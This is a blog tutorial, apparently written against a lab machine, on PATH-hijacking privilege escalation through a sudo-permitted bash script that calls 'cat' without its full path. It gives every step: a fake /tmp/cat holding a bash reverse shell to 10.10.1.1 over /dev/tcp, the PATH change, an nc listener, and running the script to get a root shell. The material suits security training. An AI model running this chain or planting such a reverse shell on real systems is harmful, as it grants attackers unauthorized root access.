Simple path hijacking (Unix/Unix-like)

Hi everyone!

Today’s post is on path injection. Let’s get started.

Identifying path injection vulnerability

There are many ways that may lead to path injection vulnerability. However, this post will only focus on path injection vulnerability in bash scripts.

Path injection vulnerability usually occurs if root users do not specify the full path of the file they would like to run. Let’s see the example below:

cmd$ sudo -l
[sudo] password for soulx: 
User soulx may run the following commands on previse:
    (root) /home/soulx/vulscript.sh

Inside vulscript.sh:

#!/bin/bash

cat /etc/shadow > /dev/null 2>&1

In this case, the cat file/command was not specified with the full path. As such we can inject another path to the $PATH environment and let a malicious cat file execute instead with root privilege.

Creating a malicious file

cmd$ nano /tmp/cat

Add the code below to the malicious cat file:

#!/bin/bash

bash -i >& /dev/tcp/10.10.1.1/1337 0>&1

Remember to change the IP address to your own. After doing so, save the file.

Make it executable

After creating the file, we have to make sure it is executable by changing the permission.

cmd$ chmod 777 /tmp/cat

Modify $PATH environment

As we created the malicious file in the /tmp directory, we will need to add it into the start of the $PATH so that /tmp directory will be searched 1st for cat file/command.

cmd$ export PATH="/tmp:$PATH"

Exploit!

Set a listening servicing

Before we exploit the vulnerable script, remember to set Netcat on your own system to listen at the port you have specified:

ownsys_cmd$ nc -lvnp 1337

Exploit the vulnerable script

We may now run the vulnerable script where our malicious cat file will be executed instead.

cmd$ sudo /home/soulx/vulscript.sh

Your listening Netcat should receive an incoming connection and giving you a root shell!

I hope these tabs have been helpful to you. Feel free to leave any comments below. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here. 🙂

Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.